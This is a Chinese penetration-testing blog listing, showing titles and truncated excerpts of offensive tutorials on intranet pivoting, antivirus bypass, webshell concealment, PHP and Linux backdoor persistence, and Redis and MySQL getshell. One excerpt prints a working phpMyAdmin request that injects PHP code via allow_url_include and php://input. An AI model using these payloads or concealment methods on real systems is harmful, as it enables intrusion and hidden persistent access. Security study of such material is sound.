迅睿CMS漏洞总结 渗透测试

迅睿CMS漏洞总结

1.漏洞的顺序按版本号排,从低版本到高版本 2.关于迅睿CMS的版本切换,可以通过以下方式,后面每个漏洞不再赘述: 1.安装并配置好php与web中间件,注意该cms的低版本需要php的低版本 2.clone该cms的官方开源地址https://gitee.com/dayrui/xunruicms 3.通过搜索commit信息里的版本号,回退到指定的版本 在PhpStorm里,右键指定的commit版本,选择"Reset Current Branch to Here" ...
最新
阅读全文
域渗透之外网打点到三层内网 渗透测试

域渗透之外网打点到三层内网

环境搭建 1.项目介绍: 本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网,详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法,对个人提升很有帮助。 2.VPS映射 1.将ip映射到公网。在公网vps使用配置frp工具的frps.ini 运行frps.exe -c frps.ini 在web1上配置f...
阅读全文
Mssql注入绕过360执行命令 渗透测试

Mssql注入绕过360执行命令

0x01 废话 有时候mssql注入会碰到-os-shell执行不了命令的情况,有可能是因为权限不够不能开启xp_cmdshell,还有可能就是杀软拦截了 常见的只有360会拦截,如果被拦截了就是下面这样的 0x02 拦截原因 这里用上x64dbg在CreateProcessA和CreateProcessW打上断点,MSSQL调用的CreateProcessW 可以看到xp_cmdshell是直接使用cmd /c来执行命令的,这拦截的原因和之前的php很相似,不过这里没有php那么高的操作空间 ...
阅读全文
记一次无回显不出网站库分离 渗透测试

记一次无回显不出网站库分离

前言 某日接到一个项目,只给了一个二维码。 1、数据管理系统 扫描二维码后在页面下方得到该公司的名字,百度搜索该公司的名字,找到一个数据中心。 访问该页面后发现存在用户名遍历,使用Burp爆破"常见用户名Top500"得到三个账号,并成功爆出其中一个账号的密码。 登陆后发现大都是一些信息管理的功能,没有发现可利用的点。 可能是没有管理员账号,所以功能较少,这种后台感觉拿到管理员账号也有点悬,先看其他的。 2、旁站 2.1 登陆后台 ...
阅读全文
红队渗透下的tp技巧 渗透测试

红队渗透下的tp技巧

概述 距离tp5 rce漏洞公开已经过去两年多,但是在实战中仍然可以遇到很多thinkphp的框架,关于thinkphp的白盒分析文章和rce payload网上已经一抓一大把,所以本文主要以黑白盒结合的形式谈谈如何在黑盒下对tp网站进行测试。 tp5的渗透要点 (最最常规payload一把梭.哈的情况就不讨论了) 以下渗透思路以5.0.*列举 开启debug下的数据库连接 tp5.0.*在debug模式下如果在数据交互点构造如sql注入、空参数等方式使数据库查询等出错,在一定情况下可能导致数据库账号密码直接显示出来。(报错信息太细了不...
阅读全文
内网渗透--对不出网目标的打法 渗透测试

内网渗透--对不出网目标的打法

文章简介 这篇文章使用红日渗透靶场(一)来进行练习对内网不出网机器的渗透,在这里感谢师傅们提供了现成的靶场环境,供我们小白来进行学习和练习。这个靶场设计的比较简单,但是通过这个靶场环境,采用多种手段进行渗透,可以使自己在没有那么多授权的真实环境条件下,通过靶场提高自己的技术。 配置网络 在VM虚拟机中按照下边的网络拓扑进行配置网络。网络拓扑图如下: win7具有双网卡,其中外网ip是192.168.8.133,内网网段是52。三台机器彼此互通,但是win server 2008和win2003不通外网。用我mac作为攻击机,来对这个靶场环境进行渗透测试。 ...
阅读全文
记一次针对SupeSite的中转注入实战 渗透测试

记一次针对SupeSite的中转注入实战

近期在一次演练行动中,对某目标进行了一次渗透测试,期间用到了sqlmap的中转注入技术,还是很有收获的,记录下来和大家共同分享,由于是实战,免不了部分地方是要马赛克的,大家见谅。 免责声明:本文中提到的漏洞利用方法和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。 手工注入 打开网页,拉到最底看到是 感觉历史有点悠久了,应该是有现成的漏洞了。查阅了一波资料,大佬已经给出了SQL注入的地方,开心的手工注入一波; 先看看有多少字段; http://www.xxxxx.com/batch.common.php?action=modelquote&...
阅读全文
如何优雅的隐藏你的Webshell 渗透测试

如何优雅的隐藏你的Webshell

拿下一个站后总希望自己的后门能够很隐蔽!不让网站管理员或者其他的Hacker发现,网上关于隐藏后门的方法也很多,如加密、包含,解析漏洞、加隐藏系统属性等等,但大部分已经都不实用了,随便找一个查马的程序就能很快的查出来,下面分享我总结的一些经验: 制作免杀webshell 隐藏webshell最主要的就是做免杀,免杀做好了,你可以把webshell放在函数库文件中或者在图片马中,太多地方可以放了,只要查杀工具查不到,你的这个webshell就能存活很长时间,毕竟管理员也没有那么多精力挨个代码去查看。 命令执行的方法 这里使用我们最常用的php的一句话马来给大家做...
阅读全文
记一次由sql注入到拿下域控的渗透测试实战演练(上) 渗透测试

记一次由sql注入到拿下域控的渗透测试实战演练(上)

本次渗透总流程: 1.从一个web页面发现SQL注入并可以通过注入getshell 2.通过对webshell的提权成功拿下服务器管理员权限 3.通过内网穿透成功连接目标服务器的3389远程桌面服务 4.通过在目标服务器上安装并使用nmap完成信息收集,为接下来横向移动以及拿下域控提供基础 5.通过mimikatz抓取本机管理员明文密码,为下一步域渗透提供条件 本次渗透靶场网络拓扑图: 工具: 蚁剑,烂土豆提权补丁,reGeorge,nmap,mimikatz,Proxifier汉化版 ...
阅读全文
踩坑版渗透:记某次授权测试 渗透测试

踩坑版渗透:记某次授权测试

信息收集 朋友闲聊中,提起想让我帮忙测试下网站的安全性,毕竟好久不做这事,有点手生。于是朋友把站点告诉了我,前部分正常步骤搜集信息,查看ip端口。 PS:本文仅用于学习交流,严禁用于任何非法用途,违者后果自负,与本站及作者无关。 解析出来发现*.*.19*.102, 扫一波端口发现, 21/tcp  open 80/tcp  open  http          Microsoft IIS...
阅读全文
渗透测试岗位面试题多人实战大汇总 渗透测试

渗透测试岗位面试题多人实战大汇总

面试经验总结 经过我对多个小伙伴的面试过程及结果分析,发现有很多人总喜欢说这个不怎么了解那个不怎么了解,如果你什么都不了解还来面什么试啊,所以切记,在面试过程中如果问到了你不会的技术问题,千万不要说这个不怎么了解,你可以说一些相近的东西,如果什么都想不到就说暂时想不起来了,千万不要表现出你什么都不会的样子,因为这样就算面试官不说什么你也自己先把自己给否掉了,这是很忌讳的。 作为一个技术人自信是基本素质,如果你都觉得自己不行,那你就是不行,你永远都不可能行了。只要你有自信觉得自己可以,那你就是可以,就算这个你不会那你也会逼着自己去学,而且这种学习效率是很高的,你会投入很大的热情与精力,...
阅读全文
Redis系列漏洞总结 渗透测试

Redis系列漏洞总结

前言 Redis的未授权漏洞一直都是一个很火的漏洞,最近看许多前辈的文章自己复现后,根据自己的实践再次总结一下,为日后复习方便回顾。 Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或...
阅读全文
权限维持之PHP后门隐藏技巧大全 渗透测试

权限维持之PHP后门隐藏技巧大全

1. attrib +s +h 创建系统隐藏文件: attrib +s +a +r +h attrib +s +h 文件名 在 Windows 10下即使开启了显示隐藏的项目,或dir仍然看不见。 2. 利用 ADS 隐藏文件 NTFS交换数据流(Alternate Data Streams,简称 ADS)是 NTFS 磁盘格式的一个特性,在 NTFS文件系统下,每个文件都可以存在多个数据流。通俗的理解,就是其它文件可以“寄宿”在某个文件身上,而在资源管理器中却只能看到宿主文件,找不到寄宿文件。利用ADS 数据流,我们可以...
阅读全文
从Webshell的视角谈攻防对抗 渗透测试

从Webshell的视角谈攻防对抗

0x0 背景 由于参加最近特殊多人活动的原因,很多渗透攻击武器也进行了对应的更新。冰蝎出了3.0版本、甚至还有好几个beta版本;还朋友圈还出了一个据说比冰蝎3.0还厉害的神器”哥斯拉”全部类型的shell均过市面所有静态查杀、流量加密过市面全部流量waf、自带的插件是冰蝎、蚁剑不能比拟的;看名字就很厉害的样子,看描述更是功能强大 不禁内心一阵酸爽。 丰富了自己部分武器库之后很多白帽子喜悦之情溢于言表,身边很多小伙伴甚至都开始在本地开始测试了;几家欢喜几家愁,总一些人的快乐终究是建立在一些人的痛苦之上的,生活真的是残酷了;这个节骨点更新大家品大家细品,很多安全公司的小伙伴可能又得彻夜...
阅读全文
Mysql注入写Shell读文件总结 渗透测试

Mysql注入写Shell读文件总结

一、导出函数写shell 利用Mysql的导出函数直接写一个可访问的webshell 1.1 条件 1.网站可访问路径的绝对路径 报错 输入异常值让脚本主动报错,或googlehacking目标的脚本报错信息 phpinfo 扫目录找phpinfo 推测 目标可能使用集成安装包,如phpstudy C:\phpStudy\WWW\C:\phpStudy\WWW\域名\ 枚举 高频绝对路径 读配置文件 中间件,web的配置文件 2.secure_file_priv 的值非NULL或包...
阅读全文
通读审计之天目MVC 代码审计

通读审计之天目MVC

0x00 前言 天目MVC是天目网络科技有限公司开发的一款专业的PHP+MYSQL产品,采用自主MVC构架。 我们今天所通读的CMS为天目MVC,从了解框架运行原理到漏洞挖掘。 源码下载地址:https://www.a5xiazai.com/php/141613.html 官网下载渠道: 因为本篇文章涉及到前台漏洞,笔者已将漏洞信息提交给官网,官网已经更新并将漏洞修补。 我们还是老样子,整个故事从index.php开始说起。 0x01 MVC的了解 我们看一下index.php的整个结...
阅读全文
phpMyAdmin/setup漏洞 渗透测试

phpMyAdmin/setup漏洞

写入WebShell 利用php配置漏洞,执行php代码进而执行系统命令 (可利用Burpsuite发送POST) POST http://192.168.2.101/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.2.101 Content-Length: 34 <?php passthru('id'); die(); ?> 将执行命令替换为 passthru('ls /var/www'); 1 查看www网站下的...
阅读全文
【黑客技术】WebShell隐藏过人技巧 渗透测试

【黑客技术】WebShell隐藏过人技巧

一个经典的过人WebShell 大概是在去年,闲着无聊的时候翻阅知乎,看到了这么一个回答:https://www.zhihu.com/question/68591788/answer/269545371 其中最后那个过人的 webshell 引起了我的注意: dataProcessor($f[$i]); } else { $c .= $this->dataProcessor($f[$i]); } } $t = $r('',"$c");...
阅读全文
内网渗透测试:隐藏通讯隧道技术(下) 渗透测试

内网渗透测试:隐藏通讯隧道技术(下)

什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。 上一节中,我们讲解了网络层的隧道技术(IPv6 隧道、ICMP 隧道)和传输层的隧道技术(TCP 隧道、UDP 隧道、常规端口转发)。现如今,TCP、UDP 通信大量被防御系统拦截,传统的Socket...
阅读全文
Redis未授权getshell及修复方案 渗透测试

Redis未授权getshell及修复方案

应用介绍 虚的不说了,简单点说就是一个日志型数据库,并有主从同步的功能(优化性能)。 漏洞介绍 默认配置下redis并没有设置密码,被攻击者恶意利用可以导致未授权访问,可以有多种利用方式:服务器权限被获取和数据删除、泄露、加密勒索、植入yam2 minerd 挖矿程序、watch-smartd挖矿木马等 安装redis docker run -itd --name redis-test -p 6379:6379 redis 常用命令 ping:检测是否连通 且 有权...
阅读全文
利用WAF进行拒绝服务攻击 渗透测试

利用WAF进行拒绝服务攻击

一、拒绝服务攻击 拒绝服务攻击,英文名称是Denial of Service. 简称DOS,即拒绝服务,造成其攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。 最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。带宽攻击指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽, 最后导致合法的用户请求无法通过。 常规的dos攻击 由黑客控制多台服务器,让这多台服务器同时去请求一个目标机器,导致目标资源耗尽。 二、WAF 也称为:网站应用级入侵...
阅读全文
一行代码引来的安全漏洞就让我们丢失了整个服务器的控制权 渗透测试

一行代码引来的安全漏洞就让我们丢失了整个服务器的控制权

之前在某厂的某次项目开发中,项目组同学设计和实现了一个“引以为傲”,额,有点扩张,不过自认为还说得过去的 feature,结果临上线前被啪啪打脸,因为实现过程中因为一行代码(没有标题党,真的是一行代码)带来的安全漏洞让我们丢失了整个服务器控制权(测试环境)。多亏了上线之前有公司安全团队的人会对代码进行扫描,才让这个漏洞被扼杀在摇篮里。 背景说明 我们的项目是一个面向全球用户的 Web 项目,用 SpringBoot 开发。在项目开发过程中,离不开各种异常信息的处理,比如表单提交参数不符合预期,业务逻辑的处理时离不开各种异常信息(例如网络抖动等)的处理。于是利用 SpringBoot ...
阅读全文
Linux常见的持久化后门汇总 提权教程

Linux常见的持久化后门汇总

0x00:前言     持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用. Linux 0x01:SSH 一、ssh软连接     SSH软连接后门的原理 1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用 2、将sshd文件软连接名称设置为su,这样应用在启动...
阅读全文
看我如何制造漏洞绕过安全软件来加入自启动 提权教程

看我如何制造漏洞绕过安全软件来加入自启动

不让我注入进程撒?加服务启动你拦截我撒?来  我用另类方法”注入”加入自启动? 众所周知,某0卫士对启动这一块做的比较严格。以往来说 大家都喜欢注册表启动,后来注册表被杀的太厉害。结果GG了。然后衍生出来服务启动?不过好景不长,服务启动也被和谐…..有反驳的可以附上你代码? (有点空手套EXP的感觉)  当然  也有服务能启动的,前提是你找到一个靠谱的白名单程序…抠鼻..我找到了…就是…不告诉你 以上是背景….目前来说  比较靠谱的一种做法是进程注入。进程注入多用于隐匿自身 以及做一些其他不可描述的事情。但…..各位程序大佬清楚 大多的 传统的...
阅读全文
看我如何制造漏洞绕过安全软件来加入自启动 渗透测试

看我如何制造漏洞绕过安全软件来加入自启动

不让我注入进程撒?加服务启动你拦截我撒?来  我用另类方法”注入”加入自启动? 众所周知,某0卫士对启动这一块做的比较严格。以往来说 大家都喜欢注册表启动,后来注册表被杀的太厉害。结果GG了。然后衍生出来服务启动?不过好景不长,服务启动也被和谐…..有反驳的可以附上你代码? (有点空手套EXP的感觉)  当然  也有服务能启动的,前提是你找到一个靠谱的白名单程序…抠鼻..我找到了…就是…不告诉你 以上是背景….目前来说  比较靠谱的一种做法是进程注入。进程注入多用于隐匿自身 以及做一些其他不可描述的事情。但…..各位程序大佬清楚 大多的 传统的...
阅读全文